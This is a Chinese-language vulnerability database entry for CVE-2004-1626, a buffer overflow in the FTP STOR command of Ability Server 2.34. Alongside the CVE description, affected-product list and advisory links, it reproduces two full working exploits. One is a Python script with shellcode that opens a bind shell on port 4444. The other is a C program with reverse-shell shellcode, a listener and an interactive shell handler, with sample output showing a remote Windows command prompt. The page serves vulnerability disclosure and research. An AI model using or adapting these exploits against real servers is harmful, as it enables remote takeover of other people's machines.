CVE-2004-1626
CVSS5.0
发布时间 :2004-10-22 00:00:00
修订时间 :2016-10-17 22:57:56
NMCOE    

[原文]Buffer overflow in Ability Server 2.34, and possibly other versions, allows remote attackers to execute arbitrary code via a long STOR command.


[CNNVD]Code-Crafters Ability Server FTP STOR和APPE参数远程缓冲区溢出漏洞(CNNVD-200410-087)

        Ability Server 2.34版本及其他可能的版本中存在缓冲区溢出漏洞。远程攻击者可以借助超长的STOR命令执行任意代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:code-crafters:ability_server:2.3.2
cpe:/a:code-crafters:ability_server:2.2.5
cpe:/a:code-crafters:ability_server:2.3.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1626
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1626
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-087
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109850947508816&w=2
(UNKNOWN)  BUGTRAQ  20041022 Ability FTP Server 2.34 Buffer Overflow Exploit
http://www.kb.cert.org/vuls/id/857846
(VENDOR_ADVISORY)  CERT-VN  VU#857846
http://www.securityfocus.com/bid/11508
(VENDOR_ADVISORY)  BID  11508
http://xforce.iss.net/xforce/xfdb/17823
(VENDOR_ADVISORY)  XF  abilityftpserver-stor-dos(17823)

- 漏洞信息

Code-Crafters Ability Server FTP STOR和APPE参数远程缓冲区溢出漏洞
中危 缓冲区溢出
2004-10-22 00:00:00 2005-10-20 00:00:00
远程  
        Ability Server 2.34版本及其他可能的版本中存在缓冲区溢出漏洞。远程攻击者可以借助超长的STOR命令执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (588)

Ability Server 2.34 FTP STOR Buffer Overflow (EDBID:588)
windows remote
2004-10-21 Verified
21 muts
N/A [点击下载]
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow   #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts                                      #
###################################
# D:\BO>ability-2.34-ftp-stor.py                       #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444               #
# localhost [127.0.0.1] 4444 (?) open               #
# Microsoft Windows XP [Version 5.1.2600]        #
# (C) Copyright 1985-2001 Microsoft Corp.        #
# D:\Program Files\abilitywebserver>                #
###################################

import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n" 
print "###################################"

# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"

sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

# Change RET address if need be.

#buffer = '\x41'*966+struct.pack('<L', 0x7C2FA0F7)+'\x42'*32+sc # RET Windows 2000 Server SP4
buffer = '\x41'*970+struct.pack('<L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2

try:
# Edit the IP, Username and Password.
ftp = FTP('127.0.0.1') 
ftp.login('ftp','ftp')
print "\nEvil Buffer sent..."
print "\nSploit will hang now because I couldn\'t figure how to use storelines()."
print "\nTry connecting with netcat to port 4444 on the remote machine."
except:
print "\nCould not Connect to FTP Server."
try:
ftp.transfercmd("STOR " + buffer) 
except:
print "\nDone."

# milw0rm.com [2004-10-21]
		

- 漏洞信息 (618)

Ability Server 2.34 FTP STOR Buffer Overflow Exploit (Unix Exploit) (EDBID:618)
windows remote
2004-11-07 Verified
21 NoPh0BiA
N/A [点击下载]
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop\abilitywebserver>

 reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
 bad chars 0x00 0x0a 0x0d.
*/
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define RET "\xC7\xF2\xC8\x77" /*win2k adv server sp4*/
#define PORT 21
#define PORT1 31337
#define BACKLOG 1

/* www.metasploit.com*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5a\x81\x73\x17\x92\x8e"
"\xe9\x41\x83\xeb\xfc\xe2\xf4\x6e\x66\xbf\x41\x92\x8e\xba\x14\xc4"
"\xd9\x62\x2d\xb6\x96\x62\x04\xae\x05\xbd\x44\xea\x8f\x03\xca\xd8"
"\x96\x62\x1b\xb2\x8f\x02\xa2\xa0\xc7\x62\x75\x19\x8f\x07\x70\x6d"
"\x72\xd8\x81\x3e\xb6\x09\x35\x95\x4f\x26\x4c\x93\x49\x02\xb3\xa9"
"\xf2\xcd\x55\xe7\x6f\x62\x1b\xb6\x8f\x02\x27\x19\x82\xa2\xca\xc8"
"\x92\xe8\xaa\x19\x8a\x62\x40\x7a\x65\xeb\x70\x52\xd1\xb7\x1c\xc9"
"\x4c\xe1\x41\xcc\xe4\xd9\x18\xf6\x05\xf0\xca\xc9\x82\x62\x1a\x8e"
"\x05\xf2\xca\xc9\x86\xba\x29\x1c\xc0\xe7\xad\x6d\x58\x60\x86\x13"
"\x62\xe9\x40\x92\x8e\xbe\x17\xc1\x07\x0c\xa9\x8d\x8e\xe9\x41\x02"
"\x8f\xe9\x41\x24\x97\xf1\xa6\x36\x97\x99\xa8\x7e\x77\x43\x21\x4b"
"\x87\x1c\xec\x59\x63\x15\x7a\xc5\xdd\xdb\x1e\xa1\xbc\xe9\x1a\x1f"
"\xc5\xf1\x10\x6d\x59\x60\x9e\x1b\x4d\x64\x34\x86\xe4\xec\x18\xc3"
"\xdd\x16\x75\x1d\x71\xbc\x45\xcb\x07\xed\xcf\x70\x7c\xc2\x66\xc6"
"\x71\xde\xbe\xc7\xa6\xd8\x81\xc2\xde\xb9\x11\xd2\xde\xa9\x11\x6d"
"\xdb\xcd\xc8\x55\xe6\x29\xe9\x92\x8c\x81\x43\x92\xf4\x80\xc8\x73"
"\xe4\xf9\x10\xc5\x71\xbc\x61\xcb\xd7\x81\x02\xdf\xca\xe9\xc8\x71"
"\x09\x13\x70\x52\x03\x95\x65\x3e\xe4\xfc\x18\x61\x25\x6e\xbb\x11"
"\x62\xbd\x87\xd6\xaa\xf9\x05\xf4\x49\xad\x65\xae\x8f\xe8\xc8\xee"
"\xaa\xa1\xc8\xee\xaa\xa5\xc8\xee\xaa\xb9\xcc\xd6\xaa\xf9\x15\xc2"
"\xdf\xb8\x10\xd3\xdf\xa0\x10\xc3\xdd\xb8\xbe\xe7\x8e\x81\x33\x6c"
"\x3d\xff\xbe\xc7\x8a\x16\x91\x1b\x68\x16\x34\x92\xe6\x44\x98\x97"
"\x40\x16\x14\x96\x07\x2a\x2b\x6d\x71\xdf\xbe\x41\x71\x9c\x41\xfa"
"\x7e\x63\x45\xcd\x71\xbc\x45\xa3\x55\xba\xbe\x42\x8e\xe9\x41";

struct sockaddr_in hrm,lar,target;
void shell(int sock)
{
 fd_set fd_read;
 char buff[1024];
 int n;
 
 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);
 
  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
 
  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }
 
  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock);
}

int conn(char *ip)
{
 int sockfd;
 hrm.sin_family = AF_INET;
 hrm.sin_port = htons(PORT);
 hrm.sin_addr.s_addr = inet_addr(ip);
 bzero(&(hrm.sin_zero),8);
 sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
{
 perror("connect");
 exit(0);
}
 printf("[x] Connected to: %s.\n",ip);
 return sockfd;
}

int listener()
{
 int sd;
 lar.sin_family = AF_INET;
 lar.sin_port = htons(PORT1);
 lar.sin_addr.s_addr = INADDR_ANY;
 bzero(&(lar.sin_zero),8);
 sd = socket(AF_INET,SOCK_STREAM,0);
if((bind(sd,(struct sockaddr *)&lar,sizeof(struct sockaddr)))<0)
{
 perror("bind");
 exit(0);
}
 printf("[x] Bind successfull.\n");
if((listen(sd,BACKLOG)) < 0)
{
 perror("listen");
 exit(0);
}
 printf("[x] Listening on port %d.\n",PORT1);
 return sd;
}
int main(int argc, char *argv[])
{
 char *buffer=malloc(1387),*A=malloc(968),*B=malloc(32),*reply=malloc(200);
 int x,l,news,f;
 memset(A,0x41,968);
 strcat(buffer,A);
 memset(B,0x42,32);
 strcat(buffer,RET);
 strcat(buffer,B);
 strcat(buffer,shellcode);
 printf("**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**\n");
 printf("[x] Launching listener.\n");
 l = listener();
 x = conn("192.168.0.1");
 sleep(5);
 printf("[x] Sending bad code...");
 write(x,"USER lar\r\nPASS lar\r\n",20);
 sleep(3);
 write(x,"STOR ",5);
 write(x,buffer,strlen(buffer));
 write(x,"\r\n\r\n",4);
 sleep(3);
 printf("done.\n");
 printf("[x] Waiting for shell.\n");
 close(x);
while(1)
{
 news = sizeof(struct sockaddr_in);
if((f=accept(l,(struct sockaddr *)&target,&news)) < 0)
 {
  perror("accept");
  continue;
 }
printf("[x] Got connection from %s.\n",inet_ntoa(target.sin_addr));
 if(!fork()){
 printf("[x] 0wn3d!\n\n");
 shell(f);
 close(f);
 exit(0);
}
 close(f);
}
 
}

// milw0rm.com [2004-11-07]
		

- 漏洞信息

11030
Ability Server FTP STOR Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Ability Server. The FTP 'STOR' command fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long argument to the 'STOR' command, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-10-22 Unknow
2004-10-22 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站